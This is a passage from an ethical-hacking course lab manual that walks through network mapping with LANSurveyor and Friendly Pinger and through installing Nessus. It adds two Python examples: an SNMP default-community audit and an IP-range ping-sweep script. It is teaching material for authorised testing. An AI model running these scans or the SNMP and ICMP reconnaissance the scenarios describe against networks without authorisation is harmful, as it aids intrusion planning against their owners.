An attacker can gather information from ARP Scan, DHCP Servers, etc. using NetScanTools Pro, as you have learned in the previous lab. Using this information an attacker can compromise a DHCP server on the network; they might disrupt network services, preventing DHCP clients from connecting to network resources. By gaining control of a DHCP server, attackers can configure DHCP clients with fraudulent TCP/IP configuration information, including an invalid default gateway or DNS server configuration.
In this lab, you will learn to draw network diagrams using LANSurveyor. To be an expert network administrator and penetration tester you need to discover network topology and produce comprehensive network diagrams for discovered networks.
Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network.
In this lab, you need to:
■ Draw a map showing the logical connectivity of your network and navigate around the map
■ Create a report that includes all your managed switches and hubs
Lab Environment
To perform the lab, you need:
■ LANSurveyor located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\LANsurveyor
■ You can also download the latest version of LANSurveyor from the link http://www.solarwinds.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the LANSurveyor tool
Lab Duration
Time: 10 Minutes
Overview of LANSurveyor
SolarWinds LANsurveyor automatically discovers your network and produces a comprehensive network diagram that can be easily exported to Microsoft Office Visio. LANsurveyor automatically detects new devices and changes to network topology. It simplifies inventory management for hardware and software assets, and addresses reporting needs for PCI compliance and other regulatory requirements.
Lab Tasks
TASK 1: Draw Network Diagram
Install LANSurveyor on your Windows Server 2012. Follow the wizard-driven installation steps and install LANSurveyor.
1. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 8.1: Windows Server 2012 - Desktop view
2. Click the LANSurveyor app to open the LANSurveyor window
FIGURE 8.2: Windows Server 2012 - Apps
3. Review the limitations of the evaluation software and then click Continue with Evaluation to continue the evaluation
FIGURE 8.3: LANSurveyor evaluation window
4. The Getting Started with LANsurveyor dialog box is displayed. Click Start Scanning Network
LANsurveyor's Responder client: manage remote Windows, Linux, and Mac OS nodes from the LANsurveyor map, including starting and stopping applications and distributing files.
LANsurveyor uses an almost immeasurable amount of network bandwidth. For each type of discovery method (ICMP Ping, NetBIOS, SIP, etc.)
The Getting Started with LANsurveyor dialog lists what you can do with LANsurveyor: scan and map Layer 1, 2, 3 network topology; export maps to Microsoft Visio; continuously scan your network automatically. Once saved, all custom maps can be used in SolarWinds network and application management software. The dialog also links to the thwack LANsurveyor forum, the online manual (LANsurveyor Administrator Guide), the Evaluation Guide and SolarWinds Support, and offers a Start Scanning Network button and a Don't show again check box.
FIGURE 8.4: Getting Started with LANSurveyor Wizard
5. The Create A Network Map window will appear; in order to draw a network diagram enter the IP addresses in Begin Address and End Address, and click Start Network Discovery
LANsurveyor uses a number of techniques to map managed switch/hub ports to their corresponding IP address nodes. It's important to remember switches and hubs are Layer 2 (Ethernet address) devices that don't have Layer 3 (IP address) information.
The Create A New Network Map window takes the network parameters: Begin Address 10.0.0.1 and End Address 10.0.0.254 (following router hops requires SNMP router access); router, switch and other SNMP device discovery with SNMPv1 and SNMPv2c (community strings public, private) and SNMPv3 options; other IP service discovery via LANsurveyor Responders (with a Responder password), Active Directory DCs, ICMP (Ping), NetBIOS clients and SIP clients; and a Mapping Speed slider from Faster to Slower.
FIGURE 8.5: New Network Map window
6. The mapping process for the entered IP address range will display as shown in the following figure
The Mapping Progress window shows Searching for IP nodes, Hop 0: 10.0.0.1-10.0.0.254, the last node contacted (WIN-D39MR5HL9E4) and counters for SNMP sends and receipts, ICMP ping sends and receipts, and subnets, nodes, routers and switches mapped.
FIGURE 8.6: Mapping progress window
7. LANsurveyor displays the map of your network
LANsurveyor's network discovery discovers all network nodes, regardless of whether they are end nodes, routers, switches or any other node with an IP address.
LANsurveyor is capable of discovering and mapping multiple VLANs on Layer 2. For example, to map a switch connecting multiple, non-consecutive VLANs
The resulting map shows the discovered nodes on 10.0.0.0-10.0.0.255, with the Overview panel listing Network Segments (1), IP Addresses (4), Domain Names (4), Node Names (4), IP Routers, LANsurveyor Responder Nodes, SNMP Nodes, SNMP Switches/Hubs, SIP (VoIP) Nodes, Layer 2 Nodes, Active Directory DCs and Groups.
FIGURE 8.7: Resulting network diagram
Lab Analysis
Document all the IP addresses, domain names, node names, IP routers, and SNMP nodes you discovered during the lab.
Tool/Utility: LANSurveyor
Information Collected/Objectives Achieved:
IP address: 10.0.0.1 - 10.0.0.254
IP Nodes Details:
■ SNMP Send - 62
■ ICMP Ping Send - 31
■ ICMP Receipts - 4
■ Nodes Mapped - 4
Network segment Details:
■ IP Address - 4
■ Domain Names - 4
■ Node Names - 4
LANsurveyor Responder Clients greatly enhance the functionality of LANsurveyor by providing device inventory and direct access to networked computers.
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does LANSurveyor map every IP address to its corresponding switch or hub port?
2. Can nodes connected via wireless access points be detected and mapped?
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Mapping a Network Using Friendly Pinger
Friendly Pinger is a user-friendly application for network administration, monitoring, and inventory.
Lab Scenario
In the previous lab, you found the SNMP, ICMP Ping, Nodes Mapped, etc. details using the tool LANSurveyor. If an attacker is able to get a hold of this information, he or she can shut down your network using SNMP. They can also get a list of interfaces on a router using the default name public and disable them using the read-write community. SNMP MIBs include information about the identity of the agent's host, and an attacker can take advantage of this information to initiate an attack. Using the ICMP reconnaissance technique an attacker can also determine the topology of the target network. Attackers could use either the ICMP "Time exceeded" or "Destination unreachable" messages. Both of these ICMP messages can cause a host to immediately drop a connection.
As an expert Network Administrator and Penetration Tester you need to discover network topology and produce comprehensive network diagrams for discovered networks, and block attacks by deploying firewalls on a network to filter unwanted traffic. You should be able to block outgoing SNMP traffic at border routers or firewalls. In this lab, you will learn to map a network using the tool Friendly Pinger.
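The two SNMP controls the scenario names, replacing default community strings and blocking SNMP at the border, are both checkable from captured traffic because SNMPv1 and v2c carry the community string in clear text at the start of every message. The following added Python example, which is not part of this lab or of Friendly Pinger, decodes just the BER header of an SNMP message (version and community) and audits a list of UDP/161 flows for default communities and for SNMP leaving the internal network. The flows, community strings, the external address 203.0.113.10 and the function names are constructed for the example; 10.0.0.0/24 and the hosts 10.0.0.1, 10.0.0.5 and 10.0.0.7 come from the lab.

```python
# Added example, not part of the CEH lab or of Friendly Pinger: decode the
# header of SNMPv1/v2c messages (version + community string) and flag the
# two risks the scenario describes: default community strings such as
# "public"/"private", and SNMP traffic leaving the internal network, which
# should be blocked at the border. Packets and addresses are constructed.
import ipaddress

DEFAULT_COMMUNITIES = {"public", "private"}
VERSION_NAMES = {0: "v1", 1: "v2c", 3: "v3"}
SYS_DESCR_OID = bytes.fromhex("2b06010201010100")   # 1.3.6.1.2.1.1.1.0, BER-encoded

def encode_tlv(tag, value):
    """Minimal BER TLV encoder (short and long definite lengths)."""
    if len(value) < 0x80:
        return bytes([tag, len(value)]) + value
    length = len(value).to_bytes((len(value).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(length)]) + length + value

def read_tlv(buf, pos):
    """Read one BER TLV at pos; returns (tag, value, next_pos). Raises ValueError if truncated."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV value")
    return tag, buf[pos:pos + length], pos + length

def build_get_request(version, community, oid=SYS_DESCR_OID):
    """Construct an SNMPv1/v2c GetRequest for one OID (sample data only)."""
    varbinds = encode_tlv(0x30, encode_tlv(0x30, encode_tlv(0x06, oid) + b"\x05\x00"))
    pdu = encode_tlv(0xA0, encode_tlv(0x02, b"\x01")   # request-id
                     + encode_tlv(0x02, b"\x00")       # error-status
                     + encode_tlv(0x02, b"\x00")       # error-index
                     + varbinds)
    return encode_tlv(0x30, encode_tlv(0x02, bytes([version])) + encode_tlv(0x04, community) + pdu)

def parse_snmp_header(pkt):
    """Return {'version', 'community'} for an SNMP message, or None if it is not SNMP-shaped."""
    try:
        tag, body, _ = read_tlv(pkt, 0)
        if tag != 0x30:
            return None
        tag, ver, pos = read_tlv(body, 0)
        if tag != 0x02:
            return None
        version = int.from_bytes(ver, "big")
        if version == 3:                       # v3 carries no community string
            return {"version": "v3", "community": None}
        tag, community, _ = read_tlv(body, pos)
        if tag != 0x04:
            return None
    except ValueError:
        return None
    return {"version": VERSION_NAMES.get(version, str(version)),
            "community": community.decode("ascii", "replace")}

def audit_flows(flows, internal_nets):
    """flows: (src_ip, dst_ip, udp_payload) tuples as seen on UDP/161 traffic.
    Returns one alert per flow that uses a default community or leaves the internal nets."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    alerts = []
    for src, dst, payload in flows:
        hdr = parse_snmp_header(payload)
        if hdr is None:
            continue
        reasons = []
        if hdr["community"] in DEFAULT_COMMUNITIES:
            reasons.append("default community string")
        if not any(ipaddress.ip_address(dst) in n for n in nets):
            reasons.append("SNMP leaving internal network")
        if reasons:
            alerts.append({"src": src, "dst": dst, **hdr, "reasons": reasons})
    return alerts

SAMPLE_FLOWS = [                                            # constructed
    ("10.0.0.7", "10.0.0.1", build_get_request(0, b"public")),
    ("10.0.0.7", "10.0.0.1", build_get_request(1, b"s3cure-example-community")),
    ("10.0.0.5", "203.0.113.10", build_get_request(1, b"private")),
    ("10.0.0.5", "10.0.0.1", b"\x30\x03\x02\x01\x03"),       # v3 header stub
    ("10.0.0.5", "10.0.0.1", b"not snmp at all"),
]

if __name__ == "__main__":
    for a in audit_flows(SAMPLE_FLOWS, ["10.0.0.0/24"]):
        print(f"{a['src']} -> {a['dst']} SNMP{a['version']} community={a['community']!r}: {', '.join(a['reasons'])}")
```

Only the outer SEQUENCE, the version INTEGER and the community OCTET STRING are decoded; the PDU is never interpreted, so the check is cheap enough to run on every datagram at a border sensor, and an SNMPv3 message is recognised and passed through without a community check.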
Lab Objectives
The objective of this lab is to help students discover and diagram network topology and map a discovered network.
In this lab, you need to:
■ Discover a network using discovery techniques
■ Diagram the network topology
■ Detect new devices and modifications made in network topology
■ Perform inventory management for hardware and software assets
Lab Environment
To perform the lab, you need:
■ Friendly Pinger located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Network Discovery and Mapping Tools\FriendlyPinger
■ You can also download the latest version of Friendly Pinger from the link http://www.kilievich.com/fpinger/download.htm
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Friendly Pinger tool
Lab Duration
Time: 10 Minutes
Overview of Network Mapping
Network mapping is the study of the physical connectivity of networks. Network mapping is often carried out to discover servers and operating systems running on networks. This technique detects new devices and modifications made in network topology. You can perform inventory management for hardware and software assets.
Friendly Pinger performs the following to map the network:
■ Monitors network devices' availability
■ Notifies if any server wakes or goes down
■ Pings all devices in parallel at once
■ Audits hardware and software components installed on the computers over the network
Lab Tasks
TASK 1: Draw Network Map
1. Install Friendly Pinger on your Windows Server 2012
2. Follow the wizard-driven installation steps and install Friendly Pinger.
3. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
FIGURE 9.1: Windows Server 2012 - Desktop view
4. Click the Friendly Pinger app to open the Friendly Pinger window
FIGURE 9.2: Windows Server 2012 - Apps
5. The Friendly Pinger window appears, and Friendly Pinger prompts you to watch an online demonstration.
6. Click No
The Friendly Pinger window opens with Demo.map, a demonstration map containing Internet, Mail, Shortcut, Server and Workstation devices.
FIGURE 9.3: FPinger Main Window
Ethical Hacking and Countermeasures Copyright O by EC־Counc11All Rights Reserved. Reproduction is Strictly Prohibited
^ You are alerted when nodes become unresponsive (or become responsive again) via a variety of notification methods.
Friendly Pinger will display IP-address of your computer and will offer an exemplary range of IP- addresses for scanning
& To see the route to a device, right-click it, select "Ping, Trace" and then "TraceRoute".In the lower part of the map a TraceRoute dialog window will appear.In the process of determination of the intermediate addresses, they will be displayed as a list in this window and a route will be displayed as red arrows on the map
7. Select File from the menu bar and select the Wizard option.
FIGURE 9.4: FPinger Starting Wizard
8. To create the initial mapping of the network, type a range of IP addresses in the specified field as shown in the following figure and click Next.
Wizard (Figure 9.5):
Local IP address: 10.0.0.7
The initial map will be created by querying the DNS server for information about the following IP addresses: 10.0.0.1-20
You can specify an exacter range of scanning to speed up this operation. For example: 10.129-135.1-5.1-10
Timeout: 1000
Timeout allows to increase searching, but you can miss some addresses.
FIGURE 9.5: FPinger Initializing IP address range
9. Then the wizard will start scanning the IP addresses in the network and list them.
10. Click Next.
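Steps 8 to 10 have the wizard sweep a range typed in Friendly Pinger's per-octet notation. The following Python, added here and not code from Friendly Pinger or the lab manual, expands that notation (and the start-end form used in the Lab Analysis table) into individual addresses and runs a sweep over a constructed responder set that mirrors Figure 9.6; the ping flags in ping_probe are an assumption for Windows and Linux, and all function names are this example's own.

```python
"""Expand a Friendly Pinger-style IP range and simulate the wizard's host sweep.

Added example (not code from Friendly Pinger or the lab manual). It assumes the
wizard's per-octet range syntax shown in step 8 ("10.129-135.1-5.1-10") and also
accepts the start-end form the Lab Analysis table uses ("10.0.0.1-10.0.0.20").
"""
import ipaddress
import itertools
import math
import subprocess
import sys
from typing import Callable, List, Tuple

# Safety cap so a mistyped range cannot silently expand into millions of probes.
MAX_ADDRESSES = 65_536

# Constructed set of hosts standing in for ICMP replies; it mirrors Figure 9.6,
# where four devices answered out of 10.0.0.1-20.
CONSTRUCTED_RESPONDERS = {"10.0.0.2", "10.0.0.3", "10.0.0.5", "10.0.0.7"}


def parse_octet(field: str) -> Tuple[int, int]:
    """Turn one octet field ("7" or "129-135") into an inclusive (low, high) span."""
    low_s, sep, high_s = field.partition("-")
    low = int(low_s)
    high = int(high_s) if sep else low
    if not 0 <= low <= high <= 255:
        raise ValueError(f"bad octet span: {field!r}")
    return low, high


def expand_range(spec: str) -> List[str]:
    """Return every address covered by `spec`, in the order a sweep would probe them."""
    spec = spec.strip()
    if spec.count(".") == 6:
        # "a.b.c.d-e.f.g.h": a start address and an end address.
        start_s, end_s = spec.split("-", 1)
        start = ipaddress.IPv4Address(start_s.strip())
        end = ipaddress.IPv4Address(end_s.strip())
        if end < start:
            raise ValueError(f"end address precedes start: {spec!r}")
        total = int(end) - int(start) + 1
        if total > MAX_ADDRESSES:
            raise ValueError(f"range too large ({total} addresses)")
        return [str(start + i) for i in range(total)]
    fields = spec.split(".")
    if len(fields) != 4:
        raise ValueError(f"expected four dotted octet fields: {spec!r}")
    spans = [parse_octet(f) for f in fields]
    total = math.prod(high - low + 1 for low, high in spans)
    if total > MAX_ADDRESSES:
        raise ValueError(f"range too large ({total} addresses)")
    # itertools.product varies the last octet fastest, matching left-to-right scan order.
    return [".".join(map(str, octets))
            for octets in itertools.product(*(range(low, high + 1) for low, high in spans))]


def is_valid_range(spec: str) -> bool:
    """True if `spec` parses and stays under the address cap."""
    try:
        expand_range(spec)
    except ValueError:
        return False
    return True


def ping_probe(addr: str, timeout_ms: int = 1000) -> bool:
    """Send one ICMP echo request with the OS ping command; True if a reply arrived.

    Like the wizard's Timeout field, a short timeout speeds the sweep up but may
    miss slow hosts, and hosts behind a firewall that drops ICMP never answer.
    The flags are an assumption for Windows (-n/-w ms) and Linux (-c/-W seconds).
    """
    if sys.platform.startswith("win"):
        cmd = ["ping", "-n", "1", "-w", str(timeout_ms), addr]
    else:
        cmd = ["ping", "-c", "1", "-W", str(max(1, timeout_ms // 1000)), addr]
    return subprocess.run(cmd, stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode == 0


def live_hosts(spec: str, probe: Callable[[str], bool]) -> List[str]:
    """Probe every address in `spec` and return the ones that answered, in order."""
    return [addr for addr in expand_range(spec) if probe(addr)]


if __name__ == "__main__":
    # Offline run against the constructed responder set; pass ping_probe for a real sweep.
    found = live_hosts("10.0.0.1-20", lambda a: a in CONSTRUCTED_RESPONDERS)
    print(f"{len(found)} devices found: {', '.join(found)}")
```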
Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network.
The map occupies the largest part of the window. Right-click it. In the context menu that appears, select "Add" and then "Workstation". A Device configuration dialog window will appear. Specify the requested parameters: device name, address, description, picture.
The device is displayed as an animated picture if it is pinged, and as a black and white picture if it is not pinged.
Wizard (Figure 9.6):
Name / IP address
WIN-MSSELCK4K41  10.0.0.2
Windows8  10.0.0.3
WIN-LXQN3WR3R9M  10.0.0.5
WIN-D39MR5HL9E4  10.0.0.7
The inquiry is completed. 4 devices found.
Remove the tick from devices which you don't want to add on the map.
FIGURE 9.6: FPinger Scanning of Addresses completed
11. Set the default options in the Wizard selection windows and click Next
Wizard (Figure 9.7):
Devices type: Workstation
Address: Use IP-address / Use DNS-name (selected)
Name: Remove DNS suffix
Addition: Add devices to the new map / Add devices to the current map (selected)
Press CTRL+I to get more information about the created map. You will see your name as the map author in the dialog window that appears.
Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address using your default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server.
FIGURE 9.7: FPinger selecting the Devices type
12. Then the client area will display the Network map in the FPinger window.
FIGURE 9.8 FPmger Client area with Network architecture
13. To scan the selected computer in the network, select the computer, select the Scan tab from the menu bar and click Scan.
FIGURE 9.9: FPinger Scanning the computers in the Network
14. It displays the scanned details in the Scanning wizard.
If you want to ping inside the network, behind the firewall, there will be no problems. If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. The same applies to the proxy server.
You may download the latest release: http://www.kilievich.com/fpinger
Select "File | Options" and configure Friendly Pinger to your taste.
Scanning (Figure 9.10):
Computer / Command / Service
WIN-MSSELCK4K41  http://WIN-MSSELCK4K41  HTTP
WIN-D39MR5HL9E4  http://WIN-D39MR5HL9E4  HTTP
Scanning complete.
Double-click the device to open it in Explorer.
FIGURE 9.10: FPinger Scanned results
15. Click the Inventory tab from the menu bar to view the configuration details of the selected computer.
FIGURE 9.11: FPinger Inventory tab
16. The General tab of the Inventory wizard shows the computer name and installed operating system.
Audit software and hardware components installed on the computers over the network.
Track user access and files opened on your computer via the network.
Inventory, General tab (Figure 9.12):
Computer/User: Host name WIN-D39MR5HL9E4; User name Administrator
Windows: Name Windows Server 2012 Release Candidate Datacenter; Service pack (none shown)
Collection time: 8/22/2012 11:22:34 AM
FIGURE 9.12: FPinger Inventory wizard General tab
17. The Misc tab shows the network IP addresses, MAC addresses, file system, and size of the disks.
Inventory, Misc tab (Figure 9.13):
Network: IP addresses 10.0.0.7; MAC addresses D4-BE-D9-C3-CE-2D
Total space 465.42 Gb; Free space 382.12 Gb
Display settings: 1366x768, 60 Hz, True Color (32 bit)
Disk  Type   Free, Gb  Size, Gb  Used, %  File System
C     Fixed  15.73     97.31     84       NTFS
D     Fixed  96.10     97.66     2        NTFS
FIGURE 9.13: FPinger Inventory wizard Misc tab
18. The Hardware tab shows the hardware component details of your networked computers.
Assignment of external commands (like telnet, tracert, net.exe) to devices.
Search of HTTP, FTP, e-mail and other network services.
The "Create Setup" function allows you to create a lite freeware version with your maps and settings.
Inventory, Hardware tab (Figure 9.14), WIN-D39MR5HL9E4:
■ Processors: 4x Intel Pentium III Xeon
■ Memory: 4096 Mb
■ BIOS: AT/AT COMPATIBLE DELL, 02/09/12
■ Monitors: Generic PnP Monitor
■ Display adapters: Intel(R) HD Graphics Family
■ Disk drives: ST3500413AS
■ Network adapters: Realtek PCIe GBE Family Controller
■ SCSI and RAID controllers: Microsoft Storage Spaces Controller
FIGURE 9.14: FPinger Inventory wizard Hardware tab
19. The Software tab shows the installed software on the computers.
Inventory, Software tab (Figure 9.15), WIN-D39MR5HL9E4: Adobe Reader X (10.1.3), eMailTrackerPro, EPSON USB Display, Friendly Pinger, Intel(R) Processor Graphics, Java(TM) 6 Update 17, Microsoft .NET Framework 4 Multi-Targeting Pack, Microsoft Application Error Reporting, Microsoft Office Excel MUI (English) 2010, Microsoft Office OneNote MUI (English) 2010, Microsoft Office Outlook MUI (English) 2010, Microsoft Office PowerPoint MUI (English) 2010, Microsoft Office Proof (English) 2010, Microsoft Office Proof (French) 2010, Microsoft Office Proof (Spanish) 2010, ...
Detail fields: Name, Version, Developer, Homepage
FIGURE 9.15: FPinger Inventory wizard Software tab
Lab Analysis
Document all the IP addresses, open and closed ports, services, and protocols you discovered during the lab.
Visualization of your computer network as a beautiful animated screen.
Tool/Utility: Friendly Pinger
Information Collected/Objectives Achieved:
IP address range: 10.0.0.1-10.0.0.20
Found IP addresses:
■ 10.0.0.2
■ 10.0.0.3
■ 10.0.0.5
■ 10.0.0.7
Details result of 10.0.0.7:
■ Computer name
■ Operating system
■ IP address
■ MAC address
■ File system
■ Size of disk
■ Hardware information
■ Software information
YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.
Questions
1. Does FPinger support proxy servers and firewalls?
2. Examine the programming language used in FPinger.
Internet Connection Required
☐ Yes ☑ No
Platform Supported
☑ Classroom ☑ iLabs
Lab
Scanning a Network Using the Nessus Tool
Nessus allows you to remotely audit a network and determine if it has been broken into or misused in some way. It also provides the ability to locally audit a specific machine for vulnerabilities.
Lab Scenario
In the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notification, ping information, track user access via the network, view graphical trace routes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get trace route information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall.
If an attacker gains physical access to a switch or other network device, he or she will be able to successfully install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. Also, it is very important that you use some methodologies to detect such rogue devices on the network.
As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.
Lab Objectives
This lab will give you experience in scanning the network for vulnerabilities, and show you how to use Nessus. It will teach you how to:
■ Use the Nessus tool
■ Scan the network for vulnerabilities
ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review
Lab Environment
To carry out the lab, you need:
■ Nessus, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
■ You can also download the latest version of Nessus from the link http://www.tenable.com/products/nessus/nessus-download-agreement
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser with Internet access
■ Administrative privileges to run the Nessus tool
Lab Duration
Time: 20 Minutes
Overview of Nessus Tool
Nessus helps students to learn, understand, and determine vulnerabilities and weaknesses of a system and network in order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities.
Lab Tasks
1. To install Nessus, navigate to D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Vulnerability Scanning Tools\Nessus
2. Double-click the Nessus-5.0.1-x86_64.msi file.
3. The Open File - Security Warning window appears; click Run.
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks
Nessus is public domain software released under the GPL.
TASK 1: Nessus Installation
Nessus is designed to automate the testing and discovery of known security problems.
FIGURE 10.1: Open File - Security Warning
4. The Nessus - InstallShield Wizard appears. During the installation process, the wizard prompts you for some basic information. Follow the instructions. Click Next.
FIGURE 10.2: The Nessus installation window
5. Before you begin installation, you must agree to the license agreement as shown in the following figure.
6. Select the radio button to accept the license agreement and click Next.
FIGURE 10.3: The Nessus InstallShield Wizard
7. Select a destination folder and click Next.
The updated Nessus security checks database can be retrieved with the command nessus-update-plugins.
Nessus has the ability to test SSLized services such as http, smtps, imaps and more.
The Nessus security scanner includes NASL (Nessus Attack Scripting Language).
FIGURE 10.4: The Nessus InstallShield Wizard
8. The wizard prompts for Setup Type. With the Complete option, all program features will be installed. Check Complete and click Next.
FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type
9. The Nessus wizard will prompt you to confirm the installation. Click Install.
Nessus gives you the choice of performing regular nondestructive security audits on a routine basis.
Nessus probes a range of addresses on a network to determine which hosts are alive.
Nessus probes network services on each host to obtain banners that contain software and OS version information
FIGURE 10.6: Nessus InstallShield Wizard
10. Once installation is complete, click Finish.
Path of the Nessus home directory for Windows: \Program Files\Tenable\Nessus
FIGURE 10.7: Nessus Install Shield wizard
Nessus Major Directories
■ The major directories of Nessus are shown in the following table.
Nessus Home Directory (Windows): \Program Files\Tenable\Nessus
Nessus Sub-Directories / Purpose:
\conf  Configuration files
\data  Stylesheet templates
\nessus\plugins  Nessus plugins
\nessus\users\<username>\kbs  User knowledgebase saved on disk
\nessus\logs  Nessus log files
TABLE 10.1: Nessus Major Directories
11. After installation, Nessus opens in your default browser.
12. The Welcome to Nessus screen appears; click the here link to connect via SSL.
Welcome to Nessus! Please connect via SSL by clicking here.
You are likely to get a security alert from your web browser saying that the SSL certificate is invalid. You may either choose to temporarily accept the risk, or can obtain a valid SSL certificate from a registrar. Please refer to the Nessus documentation for more information.
FIGURE 10.8: Nessus SSL certification
13. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.9: Internet Explorer Security Alert
14. Click the Continue to this website (not recommended) link to continue.
During the installation and daily operation of Nessus, manipulating the Nessus service is generally not required.
The Nessus Server Manager used in Nessus 4 has been deprecated.
Browser warning (Figure 10.10):
There is a problem with this website's security certificate.
The security certificate presented by this website was not issued by a trusted certificate authority. The security certificate presented by this website was issued for a different website's address.
Security certificate problems may indicate an attempt to fool you or intercept any data you send to the server.
We recommend that you close this webpage and do not continue to this website.
Click here to close this webpage.
Continue to this website (not recommended).
More information
FIGURE 10.10: Internet Explorer website’s security certificate
15. Click OK in the Security Alert pop-up, if it appears.
FIGURE 10.11: Internet Explorer Security Alert
16. The Thank you for installing Nessus screen appears. Click the Get Started > button.
Due to the technical implementation of SSL certificates, it is not possible to ship a certificate with Nessus that would be trusted by browsers.
FIGURE 10.11: Nessus Getting Started
17. In Initial Account Setup, enter the credentials given at the time of registration and click Next >.
m warning, a custom certificate to your organization must be used
Initial Account Setup (Figure 10.12):
First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the ability to create/delete users, stop ongoing scans, and change the scanner configuration.
Login: admin
Password / Confirm Password
Because the admin user can change the scanner configuration, the admin has the ability to execute commands on the remote host. Therefore, it should be noted that the admin user has the same privileges as the "root" (or administrator) user on the remote host.
FIGURE 10.12: Nessus Initial Account Setup
18. In Plugin Feed Registration, you need to enter the activation code. To obtain an activation code, click the http://www.nessus.org/register/ link.
19. Click the Using Nessus at Home icon in Obtain an Activation Code.
Obtain an Activation Code (Figure 10.13): Using Nessus at Work? / Using Nessus at Home?
If you are using the Tenable SecurityCenter, the Activation Code and plugin updates are managed from SecurityCenter. Nessus needs to be started to be able to communicate with SecurityCenter, which it will normally not do without a valid Activation Code and plugins.
FIGURE 10.13: Nessus Obtaining Activation Code
20. In Nessus for Home, accept the agreement by clicking the Agree button as shown in the following figure.
FIGURE 10.14: Nessus Subscription Agreement
21. Fill in the Register a HomeFeed section to obtain an activation code and click Register.
FIGURE 10.15: Nessus Registering HomeFeed
22. The Thank You for Registering window appears for Tenable Nessus HomeFeed.
If you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive.
After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.org or plugins-customers.nessus.org.
24. Now enter the activation code received at your email ID and click Next.
Thank You for Registering! (Figure 10.16)
Thank you for registering your Tenable Nessus HomeFeed. An email containing your activation code has just been sent to you at the email address you provided.
Please note that the Tenable Nessus HomeFeed is available for home use only. If you want to use Nessus at your place of business, you must purchase the Nessus ProfessionalFeed. Alternatively, you may purchase a subscription to the Nessus Perimeter Service and scan in the cloud! The Nessus Perimeter Service does not require any software download.
For more information on the HomeFeed, ProfessionalFeed and Nessus Perimeter Service, please visit our Discussions Forum.
FIGURE 10.16: Nessus Registration Completed
23. Now log in to your email for the activation code provided at the time of registration as shown in the following figure.
FIGURE 10.17: Nessus Registration mail
Screenshot: Welcome to Nessus, Plugin Feed Registration
As information about new vulnerabilities is discovered and released into the public domain, Tenable's research staff designs programs ("plugins") that enable Nessus to detect their presence. The plugins contain vulnerability information, the algorithm to test for the presence of the security issue, and a set of remediation actions. To use Nessus, you need to subscribe to a "Plugin Feed". You can do so by visiting http://www.nessus.org/register/ to obtain an Activation Code.
■ To use Nessus at your workplace, purchase a commercial ProfessionalFeed
■ To use Nessus in a non-commercial home environment, you can get a HomeFeed for free
■ Tenable SecurityCenter users: Enter 'SecurityCenter' in the field below
■ To perform offline plugin updates, enter 'offline' in the field below
Activation Code
Please enter your Activation Code: [the code from the registration email]
Optional Proxy Settings
[< Prev] [Next >]
Once the plugins have been downloaded and compiled, the Nessus GUI will initialize and the Nessus server will start.
FIGURE 10.18: Nessus Applying Activation Code
25. The Registering window appears as shown in the following screenshot.
Screenshot: Registering... Registering the scanner with Tenable...
FIGURE 10.19: Nessus Registering Activation Code
26. After successful registration, click Next: Download plugins > to download the Nessus plugins.
Screenshot: Registering... Successfully registered the scanner with Tenable. Successfully created the user. [Next: Download plugins >]
Nessus server configuration is managed via the GUI. The nessusd.conf file is deprecated. In addition, proxy settings, subscription feed registration, and offline updates are managed via the GUI.
FIGURE 10.20: Nessus Downloading Plugins
27. Nessus starts fetching the plugins and installs them. Downloading, installing and initializing the plugins takes some time.
Screenshot: Nessus is fetching the newest plugin set. Please wait...
